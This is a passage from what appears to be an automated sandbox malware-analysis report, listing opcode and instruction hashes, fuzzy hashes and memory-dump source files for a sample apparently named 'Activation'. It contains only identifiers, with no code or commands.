                                                                                        • Opcode Fuzzy Hash: 0987a12eb894b8dcc48d69a492d29d1331a050aeead64a6dd51d1fe983787283
                                                                                        • Instruction Fuzzy Hash: A4D01774A01109EFCB44DFB4EA826ADB7F0EB44604B2006AAD509E7200EB315F04DB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 220c6c6a5cbb27e978566055103fbb98a781bfd7054d6c58e3317a489457f6af
                                                                                        • Instruction ID: 2c7d5c951b5a024f91a10b5c29310fec27efc74b5080e9c350e556253d779f00
                                                                                        • Opcode Fuzzy Hash: 220c6c6a5cbb27e978566055103fbb98a781bfd7054d6c58e3317a489457f6af
                                                                                        • Instruction Fuzzy Hash: 2EC0803171011457DE047678B41446D7BDDDBC76613104465D50997341DE56EC0257D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d54ba53df7138789ad8b44d22318b5f0dacb5f2c6a46ee43d428c8dbdee4269
                                                                                        • Instruction ID: 8e4aa61cc5052e258f13eb60471bbe3a94a78066737fa35aef7cac1d5e546a86
                                                                                        • Opcode Fuzzy Hash: 7d54ba53df7138789ad8b44d22318b5f0dacb5f2c6a46ee43d428c8dbdee4269
                                                                                        • Instruction Fuzzy Hash: BED0A9B224AA809FE7071320BC22B563F215B87201F0B81C2E2048B0A3C6260C0ACB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df263057dd1be7a09ee8a4a4c471fe86284cc53b2ea27b20fa9ab43698293bad
                                                                                        • Instruction ID: 4e3cb031a936d4e634808a94fd7fabd8923922438fc33f9cf5ab7cc0ef95e21d
                                                                                        • Opcode Fuzzy Hash: df263057dd1be7a09ee8a4a4c471fe86284cc53b2ea27b20fa9ab43698293bad
                                                                                        • Instruction Fuzzy Hash: C4D0A7301045014FC708A768EC4BD66B790AF41311B0583D4B01D8B1E3CF61DC03CA84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f45e0af7a4472da6468415a2bc02109b1bb5896aac7ef3533e6d1539e1adce6
                                                                                        • Instruction ID: 66380d00acc87a70bc6b3061cff82c3827a4fd308c0aad2e3e01cdc282c67780
                                                                                        • Opcode Fuzzy Hash: 4f45e0af7a4472da6468415a2bc02109b1bb5896aac7ef3533e6d1539e1adce6
                                                                                        • Instruction Fuzzy Hash: 91D0C971204A658FD715AB68E944D967BA8AF4A625B0101A6F10DCB632DAA2DC008B91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9169e674724d346c6b59399a934ed38eb04c2ad00f8aa783f4afe80d800048ee
                                                                                        • Instruction ID: 6570345576d782adb4923600494666e00fd8779baf1e891ee875ec2277219ded
                                                                                        • Opcode Fuzzy Hash: 9169e674724d346c6b59399a934ed38eb04c2ad00f8aa783f4afe80d800048ee
                                                                                        • Instruction Fuzzy Hash: 01C012322002298FC604AB6CE944C8677ECEF49A2430102AAF10DCB232DAA1EC008BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f4776256a0a17b176e2f61b84a69bcf30d68bb1f58adeead3d255893ab9c5e2
                                                                                        • Instruction ID: 0d927f2b554629ed1b1aa4557217fe3d0125d76574a998f3fd862e63f779a6b9
                                                                                        • Opcode Fuzzy Hash: 9f4776256a0a17b176e2f61b84a69bcf30d68bb1f58adeead3d255893ab9c5e2
                                                                                        • Instruction Fuzzy Hash: 58D012701041054FC608E7A8EC4BC15F795BF44324355C3A9B01D4B2E79F61EC02C984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14093bb9a3b9b5103a8d79e958dc4884bc788f9d762b237b2b3e3814a6a37d37
                                                                                        • Instruction ID: 9735df6c03b26543aeecc75934105d7468adbe7a4905fc17f5e05adefc9fb85c
                                                                                        • Opcode Fuzzy Hash: 14093bb9a3b9b5103a8d79e958dc4884bc788f9d762b237b2b3e3814a6a37d37
                                                                                        • Instruction Fuzzy Hash: 41C0023AA41009DFCB00DB99E484C98B3B1EF84229B1140A6E61697672C731AD65DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe8aa318ba906934599a84d12e5657316bb0552e04ed8c6719c187946cd4392b
                                                                                        • Instruction ID: a435ef747465e442c4d28303601f62053def36e105aa94d893c63e46d8b02f05
                                                                                        • Opcode Fuzzy Hash: fe8aa318ba906934599a84d12e5657316bb0552e04ed8c6719c187946cd4392b
                                                                                        • Instruction Fuzzy Hash: 5AC02B32211420ABCB088744B808BCF3B1AEBCD300F15C245F20687150CF235C0397C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff8da82d62c3b6864d2d3f1bc4416a50c63f9efe2547fa022512f96fed5ba9d5
                                                                                        • Instruction ID: 41d758350db06e30b30834e694702725e14aa3bdc0b65188b67aa45d8b8d2eff
                                                                                        • Opcode Fuzzy Hash: ff8da82d62c3b6864d2d3f1bc4416a50c63f9efe2547fa022512f96fed5ba9d5
                                                                                        • Instruction Fuzzy Hash: CDB012B30C06100BE203D690FFE3995336DD88401F7C61541B08C8B621E3BADE2BC5D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf417136dfff397e0ded355473d8ed39ff2f33dda3af57e90b1a2b8d6f22aab7
                                                                                        • Instruction ID: 01518715f44573075fcf00a5d27bdff76da4d20fab315e6952d24a15f9244f41
                                                                                        • Opcode Fuzzy Hash: bf417136dfff397e0ded355473d8ed39ff2f33dda3af57e90b1a2b8d6f22aab7
                                                                                        • Instruction Fuzzy Hash: 42B092115597814FDA1723B805201892FA2A803270BC646D1C0A08A0F2DA0C0C1BDA26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0a5a161ca02236eff03e7bd953501e4d35d2ef6a267999bfc926922313000f0
                                                                                        • Instruction ID: 5ff35c58f3f87358c6a8c2df680efb9bb4b6acc0454ee0935405787e3d3ab115
                                                                                        • Opcode Fuzzy Hash: a0a5a161ca02236eff03e7bd953501e4d35d2ef6a267999bfc926922313000f0
                                                                                        • Instruction Fuzzy Hash: C3B0123104470D4BE5007760F606514376DE54411ABC01150F00C064115DB96C164BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd